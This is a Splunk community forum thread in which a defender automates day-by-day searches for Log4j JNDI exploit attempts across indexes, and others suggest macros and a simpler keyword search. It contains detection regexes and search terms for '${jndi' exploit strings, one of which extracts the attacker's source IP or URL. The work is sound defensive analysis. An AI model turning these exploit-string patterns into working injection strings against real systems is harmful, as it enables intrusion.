- Mark as New
- Bookmark Message
- Subscribe to Message
- Mute Message
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
TLDR: I'm trying to automate the large 25 day search to break up into 25 separate one day searches.
I'm updating a lookup table that is tracking which indexes are affected by the new log4j exploit. I do this so that I can only have to search through the affected indexes with subsequent searches. This lookup table takes hours each time it is updated for a day. Problem being, I need to know all of the affected indexes over all of the days log4j since December 10th or so.
Query that updates lookup table:
NOT [| inputlookup log4j_indexes.csv | fields index]
| regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
Each time this query finishes, it appends log4j-exploit-affected indexes to the lookup table. I need to automate the scanning over a large timeframe (December 10th 2021 - January 5th 2022). However, I want the lookup table to update as it runs over each day. I'm trying to automate the large 25 day search to break up into 25 separate one day searches. This also makes it so that if the search fails, then I don't lose all progress. I can then apply this same methodology to other searches.
Lookup Table (Log4J_affected_indexes)
Index |
index_1 |
index_2 |
How I've tried to solve the problem
- Commands I've tried while attempting to solve:
- foreach
- map
- gentimes
- subsearch
- saved searches
Gentimes (smaller timeframes) -> map
Explanation of Query below:
The gentimes part creates a table based on the selected timerange:
Earliest | Latest |
01/02/2022:00:00:00 | 01/03/2022:00:00:00 |
01/03/2022:00:00:00 | 01/04/2022:00:00:00 |
01/04/2022:00:00:00 | 01/05/2022:00:00:00 |
I try to pass those values to a subsearch as the earliest and latest parameters using map. I understand now that map doesn't seem to work for this, and I get no results when the search runs.
(gentimes and map) Query:
|gentimes start=-1
|addinfo
|eval datetime=strftime(mvrange(info_min_time,info_max_time,"1d"),"%m/%d/%Y:%H:%M:%S")
|mvexpand datetime
|fields datetime
|eval latest=datetime
|eval input_earliest=strptime(datetime, "%m/%d/%Y:%H:%M:%S") - 86400
|eval earliest=strftime(input_earliest, "%m/%d/%Y:%H:%M:%S")
|fields earliest, latest
| map search="search NOT [| inputlookup log4j_indexes.csv | fields index] earliest=$earliest$ latest=$latest$
| regex _raw=\"(\$|\%24)(\{|\%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|\%3A|\$|\%24|}|\%7D)\"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv"
Gentimes subsearch -> main search
Explanation of Query below:
I use gentimes in a subsearch to produce smaller timeframes from the larger selected timeframe:
Earliest | Latest |
01/02/2022:00:00:00 | 01/03/2022:00:00:00 |
01/03/2022:00:00:00 | 01/04/2022:00:00:00 |
01/04/2022:00:00:00 | 01/05/2022:00:00:00 |
This doesn't give me errors. However, I get no matches. I can almost guarantee this isn't running separate searches per value displayed in the above table. I'm not sure how this can be done.
(gentimes subsearch) Query:
NOT [| inputlookup log4j_indexes.csv | fields index]
[|gentimes start=-1
|addinfo
|eval datetime=strftime(mvrange(info_min_time,info_max_time,"1d"),
"%m/%d/%Y:%H:%M:%S")
|mvexpand datetime
|fields datetime
|eval latest=datetime
|eval input_earliest=strptime(datetime,"%m/%d/%Y:%H:%M:%S") - 86400
|eval earliest=strftime(input_earliest,"%m/%d/%Y:%H:%M:%S")
|fields earliest, latest]
| regex _raw="(\$|\%24)(\{|\%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|\%3A|\$|\%24|}|\%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
Conclusion
Other failed attempts:
- using foreach (can't do non-streaming)
- passing earliest and latest parameters to saved-search
- savedsearch doesn't work this way
Other solutions I've thought of:
- Running subsearch that updates a smaller_timeframe.csv file that keeps track of the smaller timeframes. Then, pass those timeframe parameters (earliest / latest) into a search somehow.
- Somehow do a recursive sort of search where each search triggers another search to go. Consequently, I could have a search trigger another search with the earliest and latest values incremented forward one day (or any amount of time).
- Maybe, Splunk has a feature (not on the search head) that can automate the same search over small timeframes, and over a large period of time. Maybe this unknown-to-me feature also has scheduling built into it.
If there is any other information that I can give to help others solve this with me, then just ask. I can edit this post...
- Mark as New
- Bookmark Message
- Subscribe to Message
- Mute Message
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
The solution to this "breaking up large timeframe into smaller timeframes" uses macros. Macro and the search are listed below:
Search Query over 7 days (split up into 7 searches)
- each of the macros updates the lookup table and also checks only indexes that haven't been checked for log4j. Therefore, it speeds up as more indexes are searched. The next step of this process is to use the same type of macro to narrow down affected sourcetypes.
NOT [| inputlookup log4j_indexes.csv | table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"@d")
| eval earliest=latest-(24*60*60)
| eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
| eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
| table earliest latest]
| regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=1,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=2,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=3,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=4,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=5,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=6,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=7,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| append [| inputlookup log4j_indexes.csv]
Lookup Table Updater Macro
append
[search NOT [| inputlookup $lookup_table$ | table $lookup_field$]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-$day$d@d")
| eval earliest=latest-(24*60*60)
| eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
| eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
| table earliest latest]
| $search_command$
| inputlookup append=true $lookup_table$
| dedup $lookup_field$
| outputlookup $lookup_table$]
- Possible Improvements:
- Recursive macros
- You could have an if statement within the macro that sort of acts like a for loop and recursively calls the next day down.
- Example: You are searching 7 days so put 7 as an argument to the macro. It then checks using eval - "IF day is more than 1 then pass that same macro with current_day-1 as the day argument - ELSE pass 1".
- Recursive macros
- Mark as New
- Bookmark Message
- Subscribe to Message
- Mute Message
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
The solution to this "breaking up large timeframe into smaller timeframes" uses macros. Macro and the search are listed below:
Search Query over 7 days (split up into 7 searches)
- each of the macros updates the lookup table and also checks only indexes that haven't been checked for log4j. Therefore, it speeds up as more indexes are searched. The next step of this process is to use the same type of macro to narrow down affected sourcetypes.
NOT [| inputlookup log4j_indexes.csv | table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"@d")
| eval earliest=latest-(24*60*60)
| eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
| eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
| table earliest latest]
| regex _raw="(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)"
| table index
| inputlookup append=true log4j_indexes.csv
| dedup index
| outputlookup log4j_indexes.csv
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=1,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=2,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=3,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=4,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=5,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=6,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| `lookup_updater_ultra(lookup_table="log4j_indexes.csv",lookup_field="index",day=7,search_command="regex _raw=\"(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)\"")`
| append [| inputlookup log4j_indexes.csv]
Lookup Table Updater Macro
append
[search NOT [| inputlookup $lookup_table$ | table $lookup_field$]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-$day$d@d")
| eval earliest=latest-(24*60*60)
| eval earliest=strftime(earliest, "%m/%d/%Y:%H:%M:%S")
| eval latest=strftime(latest, "%m/%d/%Y:%H:%M:%S")
| table earliest latest]
| $search_command$
| inputlookup append=true $lookup_table$
| dedup $lookup_field$
| outputlookup $lookup_table$]
- Possible Improvements:
- Recursive macros
- You could have an if statement within the macro that sort of acts like a for loop and recursively calls the next day down.
- Example: You are searching 7 days so put 7 as an argument to the macro. It then checks using eval - "IF day is more than 1 then pass that same macro with current_day-1 as the day argument - ELSE pass 1".
- Recursive macros
- Mark as New
- Bookmark Message
- Subscribe to Message
- Mute Message
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content

You could try something like this:
NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-1d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-2d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-3d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-4d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-5d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-6d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[ search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-7d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
| append
[| inputlookup indexes.csv]
Essentially, this goes back 8 days, one day at a time. You can modify the latest and earliest calculation to suit your requirement.
If you create a macro for the append parts, e.g. index_checker(1) with argument day
| append
[search NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"-$day$d@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"]
The search can be reduced to this:
NOT
[| inputlookup indexes.csv
| table index]
[| makeresults
| addinfo
| eval latest=relative_time(info_max_time,"@d")
| eval earliest=latest-(24*60*60)
| table earliest latest]
| table index
| inputlookup append=true indexes.csv
| dedup index
| outputlookup indexes.csv
| where index="1"
`index_checker(1)`
`index_checker(2)`
`index_checker(3)`
`index_checker(4)`
`index_checker(5)`
`index_checker(6)`
`index_checker(7)`
| append
[| inputlookup indexes.csv]
- Mark as New
- Bookmark Message
- Subscribe to Message
- Mute Message
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Does this mean that each day would run separately and in a certain order? Do they run at the same time? If not, which one would run first?
Also, you give me a great idea. I might be able to nest multiple macros to solve this in a way that can be used in other cases. 😁
- Mark as New
- Bookmark Message
- Subscribe to Message
- Mute Message
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
- There could be opportunities to use keyword/string search which are magnitudes faster.
- Your regex could be significantly improved to be more efficient.
Could you provide a few examples of the different iterations of the JDNI string that you are trying match against?
- Mark as New
- Bookmark Message
- Subscribe to Message
- Mute Message
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
There are hundreds of different iterations (it seems), after using that regex. The bigger issue is trying to update the 3 lookup tables I have right now (log4j_affected_indexes.csv, log4j_affected sourcetypes.csv, and log4j_malicious_sources.csv). Log4J started showing up around December 10th, so I need to log every malicious source that I can, and then query if there was outbound communication back to those sources. This means having to query ~25 days of logs, and extracting the malicious sources from them. Doing a full 25 day search probably wouldn't go well, so breaking it up automatically into 25 searches that each last about two hours means it would take ~3 days to run, and then I query again to look for outbound communications.
I even wrote regex to extract those malicious sources (IP or URL) from the raw data:
(\$|%24)(\{|%7B)([^jJ]*[jJ])([^nN]*[nN])([^dD]*[dD])([^iI]*[iI])(:|%3A|\$|%24|}|%7D)(?<Exploit>.*?)((\:|%3A)*?)(\/\/|%2F%2F)(((?<MaliciousSource_IP>(\d{1,3}(?:\.\d{1,3}){3}))(?:(.*?)))|(?<MaliciousSource_URL>((([\=\.\$\_\:\{\}]*?)|(%24)|(%7B)|(%7D))*?[\w\d\.]+?[\.\/\:\=]*?)+))((%7D|\}){1})
- Mark as New
- Bookmark Message
- Subscribe to Message
- Mute Message
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Simplify your searches, reconsider whether it's necessary to find every possible iteration of the jdni string and whether it's necessary to check every exploit attempt.
For example this "global" search took 4 seconds to complete against a 1TB/day Splunk environment.
("${jndi" OR "%24%7Bjndi") earliest=-7d@d
| rex "(?<jndi_string>(\$\{jndi[^\}]*\})|(%24%7Bjndi.*%7D))"
| eval jndi_string=urldecode(jndi_string)
| table _time index sourcetype jndi_string
If you have a NGEN firewall, look for LDAP or DNS outbound connections.
